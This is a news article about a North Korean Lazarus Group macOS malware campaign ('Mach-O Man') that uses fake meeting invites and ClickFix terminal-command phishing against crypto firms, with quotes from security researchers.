macOS users are at risk.
The Lazarus Group has found a new way to infiltrate victims' systems through regular work calls, according to cybersecurity expert Mauro Eldritch.
š°šµ #Lazarus is back with a new macOS malware kit.
ā Mauro Eldritch š“āā ļø (@MauroEldritch) April 21, 2026
š· Made up of multiple Mach-O binaries, we named it āMach-O Manā. It is being distributed via #ClickFix in the crypto ecosystem to steal secrets.
ā¶ļø Read my full article for ANY RUN below.#DPRK #Malware https://t.co/9yDesUCeMD pic.twitter.com/XD5w4kn0gh
North Korean hackers have launched a campaign using the modular macOS arsenal known as Mach-O Man, developed by another North Korean hacking group, Famous Chollima.
These tools consist of native Mach-O binaries tailored for the Apple ecosystem, which hosts many crypto and fintech companies.
Mach-O Man employs the ClickFix delivery methodāa social engineering technique where victims are asked to enter a command in the terminal to "fix a connection issue."
Eldritch explained that hackers send users an "urgent" meeting invitation via Zoom, Microsoft Teams, or Google Meet through Telegram.
Example of a hacker's message on Telegram. Source: Any.run.
The link directs to a phishing site that instructs users to copy and paste a simple command into their Mac terminal. By doing this, the victim grants direct access to corporate systems, SaaS platforms, and financial resources.
Often, breaches are discovered too late to prevent damage.
Researcher Vladimir S. noted that there are several variations of the attack described by Eldritch.
I also once seen a slightly different variation of the attack where the attackers hijacked the DeFi projectās domain and replaced the website with a fake message from Cloudflare asking users to enter a command to grant access. A lot of people fell for it.
ā Vladimir S. | Officer's Notes (@officer_secret) April 21, 2026
I also saw an attack inā¦
There have been instances where Lazarus hackers seized DeFi project domains using the new arsenal, replacing their websites with a fake message from Cloudflare requesting a command to grant access.
āWhat makes Lazarus particularly dangerous right now is their level of activity. Kelp, Drift and now the new macOS arsenalāall within a month. These are not random hacks, but a state-sponsored financial operation operating at a scale and pace characteristic of institutions,ā said Natalie Newson, a senior blockchain security researcher at CertiK.
In April, an Ethereum Foundation fellow identified 100 North Korean IT agents in Web3 companies.
Previously, a network of North Korean specialists in the crypto industry was also discovered by an on-chain detective.